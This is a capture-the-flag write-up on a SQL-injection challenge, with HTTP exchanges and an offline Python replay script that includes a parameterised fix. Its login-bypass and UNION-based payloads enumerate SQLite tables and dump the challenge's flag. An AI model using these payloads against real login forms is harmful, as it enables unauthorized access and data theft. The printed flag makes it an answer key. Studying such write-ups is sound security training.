DC21 quals # 3dub 02 – babysfirst

URL: http://babysfirst.shallweplayaga.me:8041
Type: SQL injection
Solution: literally online lolling on line WucGesJi
Let’s look at the HTTP exchange when we log in with the username admin and an empty password:

POST /login HTTP/1.1
Host: babysfirst.shallweplayaga.me
Content-Type: application/x-www-form-urlencoded
Content-Length: 24

username=admin&password=
--------------------------------------------------------------------
HTTP/1.1 403 Forbidden
Date: Mon, 17 Jun 2013 15:54:46 GMT
Transfer-Encoding: chunked
X-Sql: select name from users where name = 'admin' and password = '' limit 1;
Content-Type: text/html; charset=utf-8

The result is 403 Forbidden, but the X-Sql header gives us the SQL statement that was actually run, and the password is spliced straight into it. Let’s try a basic SQL injection:

POST /login HTTP/1.1
Host: babysfirst.shallweplayaga.me
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

username=admin&password='+or+'1
--------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Mon, 17 Jun 2013 15:58:29 GMT
Transfer-Encoding: chunked
X-Sql: select name from users where name = 'admin' and password = '' or '1' limit 1;
Content-Type: text/html; charset=utf-8

    success!
    logged in as root

So the login is injectable ('1' is true, so the condition matches every user and limit 1 hands back the first one, root), but we still have to find the key…

  1. First I thought it was the root password, but that isn’t it:
    username=admin&password=' union select password from users --
    -> logged in as barking up the wrong tree
    (the -- comments out the trailing ' limit 1; and, since the original WHERE clause matches nothing, the page shows the first row of the union)
  2. So I tried to find out which SQL engine was used. I got a hit with SQLite:
    username=admin&password=' union select sqlite_version() --
    -> logged in as 3.7.9
  3. We can then list the tables:
    username=admin&password=' union all select name from sqlite_master --
    -> logged in as keys
    and then dump the keys table (a union needs matching column counts, so keys must have a single column):
    username=admin&password=' union all select * from keys --
    -> logged in as The key is: literally online lolling on line WucGesJi
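
As an added example (not part of the original writeup and not the challenge’s own code), here is a Python script that replays the whole chain offline against an in-memory SQLite database: the concatenated query from the X-Sql header, the ' or '1 bypass, the three enumeration payloads above, and the parameterised fix. The database contents are constructed; only the table names, the root password text and the key string come from the writeup, while the keys column name (value) and the admin password are assumptions.

```python
import sqlite3
from urllib.parse import parse_qs

# Constructed stand-in for the challenge database (not the real one). Only the
# table names, the root password text and the key string come from the writeup;
# the keys column name "value" and the admin password are assumptions. keys is
# created first so that sqlite_master lists it first, as happened on the target.
SCHEMA = """
create table keys (value text);
insert into keys values ('The key is: literally online lolling on line WucGesJi');
create table users (name text, password text);
insert into users values ('root', 'barking up the wrong tree');
insert into users values ('admin', 'not-the-real-admin-password');
"""


def make_db():
    """In-memory SQLite database loaded with the constructed sample data."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def vulnerable_login(db, username, password):
    """The query echoed in the X-Sql header, built by string concatenation.

    Returns the name from the first row (the 'logged in as ...' value) or
    None when nothing matches (the 403 case). Because only the first row of
    whatever the query yields is used, a UNION payload whose left half
    matches nothing shows the first row of the attacker's SELECT.
    """
    sql = (f"select name from users where name = '{username}' "
           f"and password = '{password}' limit 1;")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def vulnerable_login_from_body(db, body):
    """Same check fed the raw application/x-www-form-urlencoded body, so
    '+' and %XX escapes are decoded the way the web server decodes them."""
    fields = parse_qs(body, keep_blank_values=True)
    return vulnerable_login(db, fields["username"][0], fields["password"][0])


def safe_login(db, username, password):
    """Hardened version: bound parameters, so input is data, never SQL."""
    sql = "select name from users where name = ? and password = ? limit 1;"
    row = db.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


# The request bodies from the writeup, URL-encoded, in the order they were sent.
WRITEUP_BODIES = [
    "username=admin&password=",
    "username=admin&password='+or+'1",
    "username=admin&password='+union+select+password+from+users+--",
    "username=admin&password='+union+select+sqlite_version()+--",
    "username=admin&password='+union+all+select+name+from+sqlite_master+--",
    "username=admin&password='+union+all+select+*+from+keys+--",
]


def replay_writeup(db):
    """Run every body through the vulnerable login; returns a list of
    (body, result) pairs so the chain can be inspected or asserted on."""
    return [(body, vulnerable_login_from_body(db, body)) for body in WRITEUP_BODIES]


if __name__ == "__main__":
    db = make_db()
    for body, result in replay_writeup(db):
        outcome = "403 Forbidden" if result is None else "logged in as " + result
        print(f"{body}\n  -> {outcome}")
    # The same bypass against the parameterised query simply fails to log in.
    print("safe_login with ' or '1:", safe_login(db, "admin", "' or '1"))
```

Two things the replay makes visible that the headers alone do not: the sqlite_version() payload returns whatever SQLite the script is linked against rather than 3.7.9, and which table or password shows up first depends on row order in the database, which is why keys is created first in the sample schema. Against a real target with more tables you would page through sqlite_master with limit 1 offset N instead of relying on that order.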
